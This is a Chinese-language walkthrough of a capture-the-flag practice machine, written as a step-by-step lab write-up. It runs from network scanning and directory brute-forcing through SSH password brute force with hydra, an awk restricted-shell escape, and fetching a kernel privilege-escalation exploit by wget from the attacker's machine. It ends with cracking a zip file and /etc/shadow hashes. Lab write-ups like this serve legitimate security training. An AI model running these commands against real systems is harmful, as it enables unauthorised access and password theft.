练习靶机的好处可以让你在接触实操的时候不会手忙脚乱不知道该先怎么用,光知道理论永远成为不了一个优秀的大牛.
靶机下载地址
https://pan.baidu.com/s/1wTPr1dr1hi1lzTFFu3u3Cg提取码:778f
导入靶机后用pingman扫描靶机ip
!/bin/bashif [ "$1" == "" ] thenecho "Usage:./pingman.sh [betwork]"echo "Example:./pingman.sh 192.168.1"elsefor ip in `seq 1 254`; do ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | sed 's/.$//' & donefi
此处ip
靶机:192.168.1.3
kali:192.168.1.5
第一步nmap扫
nmap -A -sS -Pn -p- 192.168.1.3
这里可以看到靶机只有ssh和apache两个服务
进入192.168.1.3:8180可以看到一个nginx初始网页
没有什么可以看到的好东西
dirb目录爆破
由于用dirb http://192.168.1.3:8180/也爆不出什么可用网页于是用工具自带的大字典进行爆破
locate dirb—–查看有关dirb的目录位置
big.txt可以用这个找到
这里可以看到apache指定网页的存放路径
我们将自己的hosts文件中的加上域名
192.168.1.3 mario.supermariohost.local
这里是一个没有马里奥的游戏
由于个人原因,这里靶机ip为192.168.36.195
因为上面的东西也没有什么特别有价值的所以我们用御剑再爆一次
dirbuster
这里发现了两个新的网页
command是一个查询用户名的界面,这个界面可以想想之前的ssh服务说不定是这个用户名登录的
luigi里面是一封信
…截图太麻烦所以这里两个页面留给大家自己实践去查看
这里不知道为什么在command.php中怎么也爆不出用户名(可能是作者故意设置的一个坑)
字典生成
cewl mario.supermariohost.local:8180/luigi.php -w /root/user.txt
john --wordlist=user.txt --stdout --rules >pass.txt
有了字典之后我们就能进行ssh爆破了
hydra ssh爆破
hydra -L user.txt -P pass.txt 192.168.36.195 ssh -t 4 -V
这个过程有点长…..
有了帐号密码当然ssh连接看看呀
这里发现有些命令执行不了,管理员做了限制.在终端输入?查看可以使用的命令有awk.好嘞,你等着!!!
awk权限绕过
awk 'BEGIN{system("/bin/bash")}'
成功绕过后我们查看内核版本信息,发现是3.13.0的老系统,回到kali找exp进行提权
靶机下载做好的提权脚本
wget 192.168.36.208/exp3.13
有了root权限后使用python切换shell
python -c 'import pty;pty.spawn("/bin/bash")'
在/root下找到flag.zip,发现有密码,继续放到kali进行解密
zip解密
fcrackzip -D -p rockyou.txt -u /root/flag.zip
查看flag
这里作者最后让我们把所以的密码都明文解密出来
把/etc/shadow下的root mario luigi copy出来放到kali进行john解密
john --wordlist=rockyou.txt userpass.txt
好了所有的内容都做完了,整理总结,最后密码懒得发图,交给大家自己实践了,哈哈哈